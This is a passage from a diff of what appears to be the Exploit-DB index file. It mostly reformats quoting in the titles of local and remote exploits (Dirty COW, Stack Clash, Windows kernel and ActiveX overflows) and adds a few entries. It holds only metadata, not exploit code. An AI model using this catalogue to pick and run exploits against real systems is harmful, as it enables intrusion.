'.pls' Buffer Overflow (Metasploit)",2014-02-13,Metasploit,windows,local,0 -31667,platforms/windows/local/31667.txt,"Microsoft Windows - SeImpersonatePrivilege - Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0 +31667,platforms/windows/local/31667.txt,"Microsoft Windows - 'SeImpersonatePrivilege' Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0 31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0 31766,platforms/windows/local/31766.rb,"Audiotran - '.pls' Stack Buffer Overflow (Metasploit)",2014-02-19,Metasploit,windows,local,0 31895,platforms/windows/local/31895.txt,"Notepad++ CCompletion Plugin 1.19 - Stack Buffer Overflow",2014-02-25,tishion,windows,local,0 @@ -8586,7 +8587,7 @@ id,file,description,date,author,platform,type,port 33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0 33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0 -40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0 +40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0 33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0 33516,platforms/lin_x86-64/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",lin_x86-64,local,0 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0 @@ -8766,7 +8767,7 @@ id,file,description,date,author,platform,type,port 37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit (MS15-051) (Metasploit)",2015-06-24,Metasploit,windows,local,0 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - Buffer Overflow (SEH)",2015-07-08,Vulnerability-Lab,windows,local,0 40709,platforms/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0 -37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 +37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",windows,local,0 37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 @@ -8787,7 +8788,7 @@ id,file,description,date,author,platform,type,port 37771,platforms/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - Overflow (SEH)",2015-08-15,St0rn,windows,local,0 37772,platforms/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0 37780,platforms/windows/local/37780.c,"ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local,0 -37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor - '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass)",2015-08-17,St0rn,windows,local,0 +37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass)",2015-08-17,St0rn,windows,local,0 37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH) (Metasploit)",2015-08-18,Metasploit,windows,local,0 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0 @@ -8937,7 +8938,7 @@ id,file,description,date,author,platform,type,port 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local,0 39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 -39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0 +39727,platforms/windows/local/39727.txt,"CompuSource Systems Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0 39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0 39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation",2016-05-02,laginimaineb,android,local,0 @@ -9058,7 +9059,7 @@ id,file,description,date,author,platform,type,port 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access Method)",2016-10-19,"Phil Oester",linux,local,0 -40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (SUID Method)",2016-10-21,"Robin Verton",linux,local,0 +40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)",2016-10-21,"Robin Verton",linux,local,0 40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - Local Buffer Overflow (SEH)",2016-10-25,n30m1nd,windows,local,0 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0 @@ -9072,7 +9073,7 @@ id,file,description,date,author,platform,type,port 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0 -40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)",2016-10-26,"Phil Oester",linux,local,0 +40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)",2016-10-26,"Phil Oester",linux,local,0 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 @@ -9082,8 +9083,8 @@ id,file,description,date,author,platform,type,port 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0 40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0 40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0 -40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,linux,local,0 -40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",linux,local,0 +40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,linux,local,0 +40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",linux,local,0 40848,platforms/windows/local/40848.java,"WinPower 4.9.0.4 - Privilege Escalation",2016-11-29,"Kacper Szurek",windows,local,0 40859,platforms/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0 40860,platforms/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0 @@ -9107,7 +9108,7 @@ id,file,description,date,author,platform,type,port 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0 40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0 -41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0 +41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0 41020,platforms/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,win_x86-64,local,0 41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0 41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0 @@ -9225,11 +9226,11 @@ id,file,description,date,author,platform,type,port 42265,platforms/linux/local/42265.py,"Flat Assembler 1.7.21 - Buffer Overflow",2017-06-28,"Juan Sacco",linux,local,0 42267,platforms/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,windows,local,0 42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0 -42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0 -42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 -42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 -42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 -42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0 +42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 +42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 42319,platforms/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Privilege Escalation",2017-07-13,geoda,windows,local,0 @@ -9238,7 +9239,7 @@ id,file,description,date,author,platform,type,port 42356,platforms/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",linux,local,0 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0 -42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0 +42382,platforms/windows/local/42382.rb,"Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0 42549,platforms/windows/local/42549.py,"Easy AVI DivX Converter 1.2.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0 42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0 42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0 @@ -9282,7 +9283,8 @@ id,file,description,date,author,platform,type,port 42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0 42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0 42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0 -42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 x64 RS2 - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0 +42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0 +42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9658,8 +9660,8 @@ id,file,description,date,author,platform,type,port 1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player (Linux) - Remote Format String",2005-09-26,c0ntex,linux,remote,0 1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 (FreeBSD) - 'Search' Remote Format String",2005-09-26,"Angelo Rosiello",bsd,remote,143 1238,platforms/linux/remote/1238.c,"Prozilla 1.3.7.4 - (ftpsearch) Results Handling Buffer Overflow",2005-10-02,taviso,linux,remote,8080 -1242,platforms/linux/remote/1242.pl,"Xine-Lib 1.1 - (media player library) Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote,0 -1243,platforms/windows/remote/1243.c,"CA iTechnology iGateway - (debug mode) Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250 +1242,platforms/linux/remote/1242.pl,"Xine-Lib 1.1 - 'Media Player Library' Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote,0 +1243,platforms/windows/remote/1243.c,"CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250 1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - 'admin_styles.php' Remote Command Execution",2005-10-11,RusH,linux,remote,0 1258,platforms/linux/remote/1258.php,"e107 < 0.6172 - 'resetcore.php' SQL Injection",2005-10-18,rgod,linux,remote,0 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 @@ -9826,7 +9828,7 @@ id,file,description,date,author,platform,type,port 2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 -2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445 +2809,platforms/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445 2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0 2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 @@ -9948,15 +9950,15 @@ id,file,description,date,author,platform,type,port 3737,platforms/windows/remote/3737.py,"Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139 3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - 'mssql_connect()' Remote Buffer Overflow",2007-04-15,rgod,windows,remote,80 3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow",2007-04-15,devcode,windows,remote,139 -3746,platforms/windows/remote/3746.txt,"Microsoft Windows - DNS RPC - Remote Buffer Overflow (2)",2007-04-18,"Andres Tarasco",windows,remote,445 +3746,platforms/windows/remote/3746.txt,"Microsoft Windows - DNS RPC Remote Buffer Overflow (2)",2007-04-18,"Andres Tarasco",windows,remote,445 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 3804,platforms/windows/remote/3804.txt,"Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,windows,remote,0 3810,platforms/windows/remote/3810.html,"IPIX Image Well - ActiveX 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 -3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - 'proxy.c' 'logurl()' Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0 -3822,platforms/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - 'proxy.c' 'logurl()' Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote,0 -3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - (exec-shield) 'proxy.c' 'logurl()' Remote Overflow",2007-05-02,Xpl017Elz,linux,remote,0 +3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0 +3822,platforms/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote,0 +3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - (exec-shield) 'proxy.c logurl()' Remote Overflow",2007-05-02,Xpl017Elz,linux,remote,0 3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Stack Overflow",2007-05-04,shinnai,windows,remote,0 3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0 3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0 @@ -10009,7 +10011,7 @@ id,file,description,date,author,platform,type,port 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL 'NCTWMAFile2.dll 2.6.2.157' - Exploit",2007-06-25,shinnai,windows,remote,0 -4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()/ Insecure Method",2007-06-26,shinnai,windows,remote,0 +4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()'/ Insecure Method",2007-06-26,shinnai,windows,remote,0 4110,platforms/windows/remote/4110.html,"Avax Vector 'Avaxswf.dll' 1.0.0.1 - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 4119,platforms/windows/remote/4119.html,"HP Digital Imaging 'hpqxml.dll 2.0.0.133' - Arbitrary Data Write Exploit",2007-06-27,callAX,windows,remote,0 4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control - 'AmxVnc.dll 1.0.13.0' Buffer Overflow",2007-06-28,rgod,windows,remote,0 @@ -10044,7 +10046,7 @@ id,file,description,date,author,platform,type,port 4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution",2007-07-30,callAX,windows,remote,0 4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 - Create-Request Remote Overflow",2007-07-30,BackBone,windows,remote,3050 4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - 'GetComponentVersion()' Remote Overflow",2007-07-31,lhoang8500,windows,remote,0 -4255,platforms/windows/remote/4255.html,"CHILKAT ASP String - 'CkString.dll 1.1' 'SaveToFile()' Insecure Method",2007-08-05,shinnai,windows,remote,0 +4255,platforms/windows/remote/4255.html,"CHILKAT ASP String - 'CkString.dll 1.1 SaveToFile()' Insecure Method",2007-08-05,shinnai,windows,remote,0 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe' Stack Overflow",2007-08-06,DeltahackingTEAM,windows,remote,0 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 @@ -10069,10 +10071,10 @@ id,file,description,date,author,platform,type,port 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation Exploit",2007-09-03,rgod,windows,remote,0 4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote,0 -4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - 'glItemCom.dll' 'SetInfo()' Heap Overflow",2007-09-05,void,windows,remote,0 +4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - 'glItemCom.dll SetInfo()' Heap Overflow",2007-09-05,void,windows,remote,0 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect - 'eng50.dll' Remote Stack Overflow",2007-09-06,devcode,windows,remote,0 -4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 - 'glitemflat.dll' 'SetClientInfo()' Heap Overflow",2007-09-07,void,windows,remote,0 -4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' 'SaveToFile()' Insecure Method",2007-09-10,shinnai,windows,remote,0 +4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow",2007-09-07,void,windows,remote,0 +4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0 SaveToFile()' Insecure Method",2007-09-10,shinnai,windows,remote,0 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow",2007-09-10,shinnai,windows,remote,0 4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - 'PDWizard.ocx' Remote Command Execution",2007-09-11,shinnai,windows,remote,0 @@ -10096,7 +10098,7 @@ id,file,description,date,author,platform,type,port 4484,platforms/windows/remote/4484.pl,"FSFDT v3.000 d9 - (HELP) Remote Buffer Overflow",2007-10-04,weak,windows,remote,0 4487,platforms/windows/remote/4487.html,"Pegasus Imaging ThumbnailXpress 1.0 - Arbitrary File Deletion",2007-10-05,shinnai,windows,remote,0 4488,platforms/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,windows,remote,0 -4506,platforms/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX Arbitrary Command Execution",2007-10-09,shinnai,windows,remote,0 +4506,platforms/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,windows,remote,0 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer 